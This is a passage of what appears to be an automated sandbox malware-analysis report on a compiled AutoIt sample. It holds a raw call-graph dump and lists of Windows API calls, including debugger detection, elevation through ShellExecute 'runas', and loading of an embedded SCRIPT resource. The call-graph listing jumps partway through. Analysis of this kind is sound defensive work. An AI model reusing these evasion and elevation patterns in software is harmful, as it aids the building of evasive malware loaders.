94418 7b64cf 94336->94418 94337->94336 94441 7b41a9 94338->94441 94341 7b3a06 94341->94069 94344 822ff0 94345 7d1c9d _free 47 API calls 94344->94345 94347 822ffd 94345->94347 94348 7b4252 84 API calls 94347->94348 94349 823006 94348->94349 94349->94349 94351 7b6ef8 94350->94351 94352 7b622b 94350->94352 94911 7bdd47 48 API calls ___crtGetEnvironmentStringsW 94351->94911 94354 7b9048 94352->94354 94355 7cf4ea 48 API calls 94354->94355 94356 7b6237 94355->94356 94356->94074 94358 7bd6f4 94357->94358 94359 7bd71b 94358->94359 94912 7bd764 55 API calls 94358->94912 94359->94077 94362 7bd654 94361->94362 94369 7bd67e 94361->94369 94363 7bd65b 94362->94363 94366 7bd6c2 94362->94366 94364 7bd666 94363->94364 94370 7bd6ab 94363->94370 94913 7bd9a0 53 API calls __cinit 94364->94913 94366->94370 94915 7cdce0 53 API calls 94366->94915 94369->94085 94370->94369 94914 7cdce0 53 API calls 94370->94914 94372 7b641f 94371->94372 94373 7b6406 94371->94373 94374 7b6a63 48 API calls 94372->94374 94375 7b6eed 48 API calls 94373->94375 94376 7b62d1 94374->94376 94375->94376 94377 7d0fa7 94376->94377 94378 7d1028 94377->94378 94379 7d0fb3 94377->94379 94918 7d103a 59 API calls 3 library calls 94378->94918 94386 7d0fd8 94379->94386 94916 7d7c0e 47 API calls __getptd_noexit 94379->94916 94382 7d1035 94382->94091 94383 7d0fbf 94917 7d6e10 8 API calls ___strgtold12_l 94383->94917 94385 7d0fca 94385->94091 94386->94091 94388 7cc064 94387->94388 94390 7cc069 Mailbox 94387->94390 94919 7cc1af 48 API calls 94388->94919 94396 7cc077 94390->94396 94920 7cc15c 48 API calls 94390->94920 94392 7cf4ea 48 API calls 94394 7cc108 94392->94394 94393 7cc152 94393->94121 94395 7cf4ea 48 API calls 94394->94395 94397 7cc113 94395->94397 94396->94392 94396->94393 94397->94121 94397->94397 94399 7c1cf6 94398->94399 94401 7c1ba2 94398->94401 94399->94128 94400 7c1c5d 94400->94128 94404 7cf4ea 48 API calls 94401->94404 94412 7c1bae 94401->94412 94403 7c1bb9 94403->94400 94407 7cf4ea 48 API calls 94403->94407 
94405 8249c4 94404->94405 94406 7cf4ea 48 API calls 94405->94406 94413 8249cf 94406->94413 94408 7c1c9f 94407->94408 94409 7c1cb2 94408->94409 94921 7b2925 48 API calls 94408->94921 94409->94128 94411 7cf4ea 48 API calls 94411->94413 94412->94403 94922 7cc15c 48 API calls 94412->94922 94413->94411 94413->94412 94414->94128 94424 7bbdfa 94415->94424 94417 7b61b1 94417->94328 94419 7b651b 94418->94419 94423 7b64dd ___crtGetEnvironmentStringsW 94418->94423 94421 7cf4ea 48 API calls 94419->94421 94420 7cf4ea 48 API calls 94422 7b64e4 94420->94422 94421->94423 94422->94336 94423->94420 94425 7bbe0d 94424->94425 94429 7bbe0a ___crtGetEnvironmentStringsW 94424->94429 94426 7cf4ea 48 API calls 94425->94426 94427 7bbe17 94426->94427 94430 7cee75 94427->94430 94429->94417 94432 7cf4ea __calloc_impl 94430->94432 94431 7d395c __crtGetStringTypeA_stat 47 API calls 94431->94432 94432->94431 94433 7cf50c 94432->94433 94434 7cf50e std::exception::exception 94432->94434 94433->94429 94439 7d6805 RaiseException 94434->94439 94436 7cf538 94440 7d673b 47 API calls _free 94436->94440 94438 7cf54a 94438->94429 94439->94436 94440->94438 94506 7b4214 94441->94506 94446 824f73 94448 7b4252 84 API calls 94446->94448 94447 7b41d4 LoadLibraryExW 94516 7b4291 94447->94516 94450 824f7a 94448->94450 94452 7b4291 3 API calls 94450->94452 94454 824f82 94452->94454 94542 7b44ed 94454->94542 94455 7b41fb 94455->94454 94456 7b4207 94455->94456 94457 7b4252 84 API calls 94456->94457 94459 7b39fe 94457->94459 94459->94341 94465 7fc396 94459->94465 94462 824fa9 94550 7b4950 94462->94550 94464 824fb6 94466 7b4517 83 API calls 94465->94466 94467 7fc405 94466->94467 94731 7fc56d 94467->94731 94470 7b44ed 64 API calls 94471 7fc432 94470->94471 94472 7b44ed 64 API calls 94471->94472 94473 7fc442 94472->94473 94474 7b44ed 64 API calls 94473->94474 94475 7fc45d 94474->94475 94476 7b44ed 64 API calls 94475->94476 94477 7fc478 94476->94477 94478 7b4517 83 API calls 94477->94478 94479 7fc48f 94478->94479 94480 
7d395c __crtGetStringTypeA_stat 47 API calls 94479->94480 94481 7fc496 94480->94481 94482 7d395c __crtGetStringTypeA_stat 47 API calls 94481->94482 94483 7fc4a0 94482->94483 94484 7b44ed 64 API calls 94483->94484 94485 7fc4b4 94484->94485 94486 7fbf5a GetSystemTimeAsFileTime 94485->94486 94487 7fc4c7 94486->94487 94488 7fc4dc 94487->94488 94489 7fc4f1 94487->94489 94490 7d1c9d _free 47 API calls 94488->94490 94491 7fc4f7 94489->94491 94492 7fc556 94489->94492 94494 7fc4e2 94490->94494 94737 7fb965 94491->94737 94493 7d1c9d _free 47 API calls 94492->94493 94498 7fc41b 94493->94498 94496 7d1c9d _free 47 API calls 94494->94496 94496->94498 94498->94344 94500 7b4252 94498->94500 94499 7d1c9d _free 47 API calls 94499->94498 94501 7b425c 94500->94501 94503 7b4263 94500->94503 94502 7d35e4 __fcloseall 83 API calls 94501->94502 94502->94503 94504 7b4283 FreeLibrary 94503->94504 94505 7b4272 94503->94505 94504->94505 94505->94344 94555 7b4339 94506->94555 94509 7b423c 94511 7b41bb 94509->94511 94512 7b4244 FreeLibrary 94509->94512 94513 7d3499 94511->94513 94512->94511 94563 7d34ae 94513->94563 94515 7b41c8 94515->94446 94515->94447 94642 7b42e4 94516->94642 94519 7b42b8 94520 7b41ec 94519->94520 94521 7b42c1 FreeLibrary 94519->94521 94523 7b4380 94520->94523 94521->94520 94524 7cf4ea 48 API calls 94523->94524 94525 7b4395 94524->94525 94650 7b47b7 94525->94650 94527 7b43a1 ___crtGetEnvironmentStringsW 94528 7b43dc 94527->94528 94530 7b4499 94527->94530 94531 7b44d1 94527->94531 94529 7b4950 57 API calls 94528->94529 94535 7b43e5 94529->94535 94653 7b406b CreateStreamOnHGlobal 94530->94653 94664 7fc750 93 API calls 94531->94664 94534 7b44ed 64 API calls 94534->94535 94535->94534 94537 7b4479 94535->94537 94538 824ed7 94535->94538 94659 7b4517 94535->94659 94537->94455 94539 7b4517 83 API calls 94538->94539 94540 824eeb 94539->94540 94541 7b44ed 64 API calls 94540->94541 94541->94537 94543 7b44ff 94542->94543 94546 824fc0 94542->94546 94688 7d381e 94543->94688 94547 7fbf5a 
94708 7fbdb4 94547->94708 94549 7fbf70 94549->94462 94551 7b495f 94550->94551 94554 825002 94550->94554 94713 7d3e65 94551->94713 94553 7b4967 94553->94464 94559 7b434b 94555->94559 94558 7b4321 LoadLibraryA GetProcAddress 94558->94509 94560 7b422f 94559->94560 94561 7b4354 LoadLibraryA 94559->94561 94560->94509 94560->94558 94561->94560 94562 7b4365 GetProcAddress 94561->94562 94562->94560 94566 7d34ba __freefls@4 94563->94566 94564 7d34cd 94611 7d7c0e 47 API calls __getptd_noexit 94564->94611 94566->94564 94567 7d34fe 94566->94567 94582 7de4c8 94567->94582 94568 7d34d2 94612 7d6e10 8 API calls ___strgtold12_l 94568->94612 94571 7d3503 94572 7d350c 94571->94572 94573 7d3519 94571->94573 94613 7d7c0e 47 API calls __getptd_noexit 94572->94613 94575 7d3543 94573->94575 94576 7d3523 94573->94576 94596 7de5e0 94575->94596 94614 7d7c0e 47 API calls __getptd_noexit 94576->94614 94577 7d34dd @_EH4_CallFilterFunc@8 __freefls@4 94577->94515 94583 7de4d4 __freefls@4 94582->94583 94584 7d7cf4 __lock 47 API calls 94583->94584 94591 7de4e2 94584->94591 94585 7de559 94621 7d69d0 47 API calls __crtGetStringTypeA_stat 94585->94621 94588 7de560 94590 7de56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 94588->94590 94594 7de552 94588->94594 94589 7de5cc __freefls@4 94589->94571 94590->94594 94591->94585 94592 7d7d7c __mtinitlocknum 47 API calls 94591->94592 94591->94594 94619 7d4e5b 48 API calls __lock 94591->94619 94620 7d4ec5 LeaveCriticalSection LeaveCriticalSection _doexit 94591->94620 94592->94591 94616 7de5d7 94594->94616 94597 7de600 __wopenfile 94596->94597 94598 7de61a 94597->94598 94610 7de7d5 94597->94610 94628 7d185b 59 API calls 2 library calls 94597->94628 94626 7d7c0e 47 API calls __getptd_noexit 94598->94626 94600 7de61f 94627 7d6e10 8 API calls ___strgtold12_l 94600->94627 94602 7de838 94623 7e63c9 94602->94623 94604 7d354e 94615 7d3570 LeaveCriticalSection LeaveCriticalSection _fseek 94604->94615 94606 7de7ce 94606->94610 94629 7d185b 59 API calls 2 
library calls 94606->94629 94608 7de7ed 94608->94610 94630 7d185b 59 API calls 2 library calls 94608->94630 94610->94598 94610->94602 94611->94568 94612->94577 94613->94577 94614->94577 94615->94577 94622 7d7e58 LeaveCriticalSection 94616->94622 94618 7de5de 94618->94589 94619->94591 94620->94591 94621->94588 94622->94618 94631 7e5bb1 94623->94631 94625 7e63e2 94625->94604 94626->94600 94627->94604 94628->94606 94629->94608 94630->94610 94632 7e5bbd __freefls@4 94631->94632 94633 7e5bcf 94632->94633 94636 7e5c06 94632->94636 94634 7d7c0e ___strgtold12_l 47 API calls 94633->94634 94635 7e5bd4 94634->94635 94637 7d6e10 ___strgtold12_l 8 API calls 94635->94637 94638 7e5c78 __wsopen_helper 110 API calls 94636->94638 94641 7e5bde __freefls@4 94637->94641 94639 7e5c23 94638->94639 94640 7e5c4c __wsopen_helper LeaveCriticalSection 94639->94640 94640->94641 94641->94625 94646 7b42f6 94642->94646 94645 7b42cc LoadLibraryA GetProcAddress 94645->94519 94647 7b42aa 94646->94647 94648 7b42ff LoadLibraryA 94646->94648 94647->94519 94647->94645 94648->94647 94649 7b4310 GetProcAddress 94648->94649 94649->94647 94651 7cf4ea 48 API calls 94650->94651 94652 7b47c9 94651->94652 94652->94527 94654 7b4085 FindResourceExW 94653->94654 94658 7b40a2 94653->94658 94655 824f16 LoadResource 94654->94655 94654->94658 94656 824f2b SizeofResource 94655->94656 94655->94658 94657 824f3f LockResource 94656->94657 94656->94658 94657->94658 94658->94528 94660 824fe0 94659->94660 94661 7b4526 94659->94661 94665 7d3a8d 94661->94665 94663 7b4534 94663->94535 94664->94528 94666 7d3a99 __freefls@4 94665->94666 94667 7d3aa7 94666->94667 94669 7d3acd 94666->94669 94678 7d7c0e 47 API calls __getptd_noexit 94667->94678 94680 7d4e1c 94669->94680 94670 7d3aac 94679 7d6e10 8 API calls ___strgtold12_l 94670->94679 94673 7d3ad3 94686 7d39fe 81 API calls 3 library calls 94673->94686 94675 7d3ae2 94687 7d3b04 LeaveCriticalSection LeaveCriticalSection _fseek 94675->94687 94677 7d3ab7 __freefls@4 94677->94663 
94678->94670 94679->94677 94681 7d4e2c 94680->94681 94682 7d4e4e EnterCriticalSection 94680->94682 94681->94682 94683 7d4e34 94681->94683 94684 7d4e44 94682->94684 94685 7d7cf4 __lock 47 API calls 94683->94685 94684->94673 94685->94684 94686->94675 94687->94677 94691 7d3839 94688->94691 94690 7b4510 94690->94547 94692 7d3845 __freefls@4 94691->94692 94693 7d3880 __freefls@4 94692->94693 94694 7d3888 94692->94694 94695 7d385b _memset 94692->94695 94693->94690 94696 7d4e1c __lock_file 48 API calls 94694->94696 94704 7d7c0e 47 API calls __getptd_noexit 94695->94704 94697 7d388e 94696->94697 94706 7d365b 62 API calls 5 library calls 94697->94706 94700 7d3875 94705 7d6e10 8 API calls ___strgtold12_l 94700->94705 94701 7d38a4 94707 7d38c2 LeaveCriticalSection LeaveCriticalSection _fseek 94701->94707 94704->94700 94705->94693 94706->94701 94707->94693 94711 7d344a GetSystemTimeAsFileTime 94708->94711 94710 7fbdc3 94710->94549 94712 7d3478 __aulldiv 94711->94712 94712->94710 94714 7d3e71 __freefls@4 94713->94714 94715 7d3e7f 94714->94715 94716 7d3e94 94714->94716 94727 7d7c0e 47 API calls __getptd_noexit 94715->94727 94718 7d4e1c __lock_file 48 API calls 94716->94718 94720 7d3e9a 94718->94720 94719 7d3e84 94728 7d6e10 8 API calls ___strgtold12_l 94719->94728 94729 7d3b0c 55 API calls 3 library calls 94720->94729 94723 7d3ea5 94730 7d3ec5 LeaveCriticalSection LeaveCriticalSection _fseek 94723->94730 94725 7d3eb7 94726 7d3e8f __freefls@4 94725->94726 94726->94553 94727->94719 94728->94726 94729->94723 94730->94725 94733 7fc581 __tzset_nolock _wcscmp 94731->94733 94732 7b44ed 64 API calls 94732->94733 94733->94732 94734 7fbf5a GetSystemTimeAsFileTime 94733->94734 94735 7fc417 94733->94735 94736 7b4517 83 API calls 94733->94736 94734->94733 94735->94470 94735->94498 94736->94733 94738 7fb97e 94737->94738 94739 7fb970 94737->94739 94741 7fb9c3 94738->94741 94742 7d3499 117 API calls 94738->94742 94767 7fb987 94738->94767 94740 7d3499 117 API calls 94739->94740 94740->94738 
94768 7fbbe8 64 API calls 3 library calls 94741->94768 94744 7fb9a8 94742->94744 94744->94741 94746 7fb9b1 94744->94746 94745 7fba07 94747 7fba2c 94745->94747 94748 7fba0b 94745->94748 94746->94767 94779 7d35e4 94746->94779 94769 7fb7e5 47 API calls __crtGetStringTypeA_stat 94747->94769 94750 7fba18 94748->94750 94753 7d35e4 __fcloseall 83 API calls 94748->94753 94756 7d35e4 __fcloseall 83 API calls 94750->94756 94750->94767 94752 7fba34 94754 7fba5a 94752->94754 94755 7fba3a 94752->94755 94753->94750 94770 7fba8a 90 API calls 94754->94770 94757 7fba47 94755->94757 94759 7d35e4 __fcloseall 83 API calls 94755->94759 94756->94767 94761 7d35e4 __fcloseall 83 API calls 94757->94761 94757->94767 94759->94757 94760 7fba61 94771 7fbb64 94760->94771 94761->94767 94764 7fba75 94766 7d35e4 __fcloseall 83 API calls 94764->94766 94764->94767 94765 7d35e4 __fcloseall 83 API calls 94765->94764 94766->94767 94767->94499 94768->94745 94769->94752 94770->94760 94772 7fbb77 94771->94772 94773 7fbb71 94771->94773 94775 7fbb88 94772->94775 94776 7d1c9d _free 47 API calls 94772->94776 94774 7d1c9d _free 47 API calls 94773->94774 94774->94772 94777 7d1c9d _free 47 API calls 94775->94777 94778 7fba68 94775->94778 94776->94775 94777->94778 94778->94764 94778->94765 94780 7d35f0 __freefls@4 94779->94780 94781 7d361c 94780->94781 94782 7d3604 94780->94782 94784 7d4e1c __lock_file 48 API calls 94781->94784 94789 7d3614 __freefls@4 94781->94789 94808 7d7c0e 47 API calls __getptd_noexit 94782->94808 94786 7d362e 94784->94786 94785 7d3609 94809 7d6e10 8 API calls ___strgtold12_l 94785->94809 94792 7d3578 94786->94792 94789->94767 94793 7d359b 94792->94793 94794 7d3587 94792->94794 94800 7d3597 94793->94800 94811 7d2c84 94793->94811 94851 7d7c0e 47 API calls __getptd_noexit 94794->94851 94796 7d358c 94852 7d6e10 8 API calls ___strgtold12_l 94796->94852 94810 7d3653 LeaveCriticalSection LeaveCriticalSection _fseek 94800->94810 94804 7d35b5 94828 7de9d2 94804->94828 94806 7d35bb 94806->94800 94807 
96263->96269 96264->96276 96265 7b37ed 96289 7b390f DeleteObject DestroyWindow Mailbox 96265->96289 96266->96244 96293 7b3847 Shell_NotifyIconW _memset 96266->96293 96294 7f55bd 70 API calls _memset 96267->96294 96268->96276 96269->96266 96270 821db5 96269->96270 96290 7b2ff6 16 API calls 96270->96290 96275 821e68 96275->96276 96278 821e4c 96279 7b4ffc 67 API calls 96278->96279 96279->96280 96280->96244 96282 7cec1c 96281->96282 96283 7ceb9a _memset 96281->96283 96282->96276 96284 7b51af 50 API calls 96283->96284 96286 7cebc1 96284->96286 96285 7cec05 KillTimer SetTimer 96285->96282 96286->96285 96287 823c7a Shell_NotifyIconW 96286->96287 96287->96285 96288->96265 96289->96276 96290->96276 96291->96252 96292->96266 96293->96278 96294->96275 96295->96280 96296->96261 96297 82197b 96302 7cdd94 96297->96302 96301 82198a 96303 7cf4ea 48 API calls 96302->96303 96304 7cdd9c 96303->96304 96305 7cddb0 96304->96305 96310 7cdf3d 96304->96310 96309 7d0f0a 52 API calls __cinit 96305->96309 96309->96301 96311 7cdf46 96310->96311 96313 7cdda8 96310->96313 96342 7d0f0a 52 API calls __cinit 96311->96342 96314 7cddc0 96313->96314 96315 7bd7f7 48 API calls 96314->96315 96316 7cddd7 GetVersionExW 96315->96316 96317 7b6a63 48 API calls 96316->96317 96318 7cde1a 96317->96318 96343 7cdfb4 96318->96343 96321 7b6571 48 API calls 96322 7cde2e 96321->96322 96324 8224c8 96322->96324 96347 7cdf77 96322->96347 96326 7cdea4 GetCurrentProcess 96356 7cdf5f LoadLibraryA GetProcAddress 96326->96356 96327 7cdebb 96328 7cdf31 GetSystemInfo 96327->96328 96329 7cdee3 96327->96329 96332 7cdf0e 96328->96332 96350 7ce00c 96329->96350 96334 7cdf1c FreeLibrary 96332->96334 96335 7cdf21 96332->96335 96334->96335 96335->96305 96336 7cdf29 GetSystemInfo 96339 7cdf03 96336->96339 96337 7cdef9 96353 7cdff4 96337->96353 96339->96332 96341 7cdf09 FreeLibrary 96339->96341 96341->96332 96342->96313 96344 7cdfbd 96343->96344 96345 7bb18b 48 API calls 96344->96345 96346 7cde22 96345->96346 96346->96321 96357 7cdf89 
96347->96357 96361 7ce01e 96350->96361 96354 7ce00c 2 API calls 96353->96354 96355 7cdf01 GetNativeSystemInfo 96354->96355 96355->96339 96356->96327 96358 7cdea0 96357->96358 96359 7cdf92 LoadLibraryA 96357->96359 96358->96326 96358->96327 96359->96358 96360 7cdfa3 GetProcAddress 96359->96360 96360->96358 96362 7cdef1 96361->96362 96363 7ce027 LoadLibraryA 96361->96363 96362->96336 96362->96337 96363->96362 96364 7ce038 GetProcAddress 96363->96364 96364->96362 96365 828eb8 96369 7fa635 96365->96369 96367 828ec3 96368 7fa635 84 API calls 96367->96368 96368->96367 96370 7fa642 96369->96370 96379 7fa66f 96369->96379 96371 7fa671 96370->96371 96372 7fa676 96370->96372 96377 7fa669 96370->96377 96370->96379 96381 7cec4e 81 API calls 96371->96381 96374 7b936c 81 API calls 96372->96374 96375 7fa67d 96374->96375 96376 7b510d 48 API calls 96375->96376 96376->96379 96380 7c4525 61 API calls ___crtGetEnvironmentStringsW 96377->96380 96379->96367 96380->96379 96381->96372 96382 7bef80 96383 7c3b70 331 API calls 96382->96383 96384 7bef8c 96383->96384 96385 8219dd 96390 7b4a30 96385->96390 96387 8219f1 96410 7d0f0a 52 API calls __cinit 96387->96410 96389 8219fb 96391 7b4a40 __ftell_nolock 96390->96391 96392 7bd7f7 48 API calls 96391->96392 96393 7b4af6 96392->96393 96394 7b5374 50 API calls 96393->96394 96395 7b4aff 96394->96395 96411 7b363c 96395->96411 96398 7b518c 48 API calls 96399 7b4b18 96398->96399 96400 7b64cf 48 API calls 96399->96400 96401 7b4b29 96400->96401 96402 7bd7f7 48 API calls 96401->96402 96403 7b4b32 96402->96403 96417 7b49fb 96403->96417 96405 7b4b43 Mailbox 96405->96387 96406 7b61a6 48 API calls 96409 7b4b3d _wcscat Mailbox __wsetenvp 96406->96409 96407 7bce19 48 API calls 96407->96409 96408 7b64cf 48 API calls 96408->96409 96409->96405 96409->96406 96409->96407 96409->96408 96410->96389 96412 7b3649 __ftell_nolock 96411->96412 96431 7b366c GetFullPathNameW 96412->96431 96414 7b365a 96415 7b6a63 48 API calls 96414->96415 96416 7b3669 96415->96416 
96416->96398 96433 7bbcce 96417->96433 96420 7b4a2b 96420->96409 96421 8241cc RegQueryValueExW 96422 824246 RegCloseKey 96421->96422 96423 8241e5 96421->96423 96424 7cf4ea 48 API calls 96423->96424 96425 8241fe 96424->96425 96426 7b47b7 48 API calls 96425->96426 96427 824208 RegQueryValueExW 96426->96427 96428 824224 96427->96428 96429 82423b 96427->96429 96430 7b6a63 48 API calls 96428->96430 96429->96422 96430->96429 96432 7b368a 96431->96432 96432->96414 96434 7bbce8 96433->96434 96438 7b4a0a RegOpenKeyExW 96433->96438 96435 7cf4ea 48 API calls 96434->96435 96436 7bbcf2 96435->96436 96437 7cee75 48 API calls 96436->96437 96437->96438 96438->96420 96438->96421

                                                                              Control-flow Graph

                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 38efee3ae7810dbb8eace232f8ed2d61c987908e249679c51965c43f5d0eba68
                                                                              • Instruction ID: e1a0642301057b1e55cbcc00464c4903eec3743c0e1c269a911fa8f213795359
                                                                              • Opcode Fuzzy Hash: 38efee3ae7810dbb8eace232f8ed2d61c987908e249679c51965c43f5d0eba68
                                                                              • Instruction Fuzzy Hash: 40325A75A02269CBCB24CF54DC856E9B7B5FB4A310F5940DAE40AE7B81D7389E80CF52

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,007B3AA3,?), ref: 007B3D45
                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,007B3AA3,?), ref: 007B3D57
                                                                              • GetFullPathNameW.KERNEL32(00007FFF,?,?,00871148,00871130,?,?,?,?,007B3AA3,?), ref: 007B3DC8
                                                                                • Part of subcall function 007B6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,007B3DEE,00871148,?,?,?,?,?,007B3AA3,?), ref: 007B6471
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,007B3AA3,?), ref: 007B3E48
                                                                              • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008628F4,00000010), ref: 00821CCE
                                                                              • SetCurrentDirectoryW.KERNEL32(?,00871148,?,?,?,?,?,007B3AA3,?), ref: 00821D06
                                                                              • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0084DAB4,00871148,?,?,?,?,?,007B3AA3,?), ref: 00821D89
                                                                              • ShellExecuteW.SHELL32(00000000,?,?,?,?,007B3AA3), ref: 00821D90
                                                                                • Part of subcall function 007B3E6E: GetSysColorBrush.USER32(0000000F), ref: 007B3E79
                                                                                • Part of subcall function 007B3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 007B3E88
                                                                                • Part of subcall function 007B3E6E: LoadIconW.USER32(00000063), ref: 007B3E9E
                                                                                • Part of subcall function 007B3E6E: LoadIconW.USER32(000000A4), ref: 007B3EB0
                                                                                • Part of subcall function 007B3E6E: LoadIconW.USER32(000000A2), ref: 007B3EC2
                                                                                • Part of subcall function 007B3E6E: RegisterClassExW.USER32(?), ref: 007B3F30
                                                                                • Part of subcall function 007B36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 007B36E6
                                                                                • Part of subcall function 007B36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B3707
                                                                                • Part of subcall function 007B36B8: ShowWindow.USER32(00000000,?,?,?,?,007B3AA3,?), ref: 007B371B
                                                                                • Part of subcall function 007B36B8: ShowWindow.USER32(00000000,?,?,?,?,007B3AA3,?), ref: 007B3724
                                                                                • Part of subcall function 007B4FFC: _memset.LIBCMT ref: 007B5022
                                                                                • Part of subcall function 007B4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007B50CB
                                                                              Strings
                                                                              • This is a third-party compiled AutoIt script., xrefs: 00821CC8
                                                                              • runas, xrefs: 00821D84
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                              • String ID: This is a third-party compiled AutoIt script.$runas
                                                                              • API String ID: 438480954-3287110873
                                                                              • Opcode ID: ca6984b8538bdc02f9c9247cdc6a6cb3a00f3f2b7bd5c10461b06185c892da97
                                                                              • Instruction ID: 6c9366069256f638b56c6c48375467b773617620f852f76baf183bc6494ac2f6
                                                                              • Opcode Fuzzy Hash: ca6984b8538bdc02f9c9247cdc6a6cb3a00f3f2b7bd5c10461b06185c892da97
                                                                              • Instruction Fuzzy Hash: A151F530A04248EACF11ABB8EC4EFED7B75FB55740F008065F615A6296DA7CDA85CB31

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetVersionExW.KERNEL32(?), ref: 007CDDEC
                                                                              • GetCurrentProcess.KERNEL32(00000000,0084DC38,?,?), ref: 007CDEAC
                                                                              • GetNativeSystemInfo.KERNELBASE(?,0084DC38,?,?), ref: 007CDF01
                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 007CDF0C
                                                                              • FreeLibrary.KERNEL32(00000000,?,?), ref: 007CDF1F
                                                                              • GetSystemInfo.KERNEL32(?,0084DC38,?,?), ref: 007CDF29
                                                                              • GetSystemInfo.KERNEL32(?,0084DC38,?,?), ref: 007CDF35
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                              • String ID:
                                                                              • API String ID: 3851250370-0
                                                                              • Opcode ID: b71a3f6c5c06655b0a72d2a9c5c6b7ae8f08131195f4c31db96c5df860bf6c6a
                                                                              • Instruction ID: 35a5663f624190e910d547bb1768956a892e0dc54da64677a07a81c7333622e2
                                                                              • Opcode Fuzzy Hash: b71a3f6c5c06655b0a72d2a9c5c6b7ae8f08131195f4c31db96c5df860bf6c6a
                                                                              • Instruction Fuzzy Hash: 8A61B47180A394DBCF25DF6894C06ED7FB4BF29300B1989EDD8459F207D628C948CB65

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,007B449E,?,?,00000000,00000001), ref: 007B407B
                                                                              • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007B449E,?,?,00000000,00000001), ref: 007B4092
                                                                              • LoadResource.KERNEL32(?,00000000,?,?,007B449E,?,?,00000000,00000001,?,?,?,?,?,?,007B41FB), ref: 00824F1A
                                                                              • SizeofResource.KERNEL32(?,00000000,?,?,007B449E,?,?,00000000,00000001,?,?,?,?,?,?,007B41FB), ref: 00824F2F
                                                                              • LockResource.KERNEL32(007B449E,?,?,007B449E,?,?,00000000,00000001,?,?,?,?,?,?,007B41FB,00000000), ref: 00824F42
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                              • String ID: SCRIPT
                                                                              • API String ID: 3051347437-3967369404
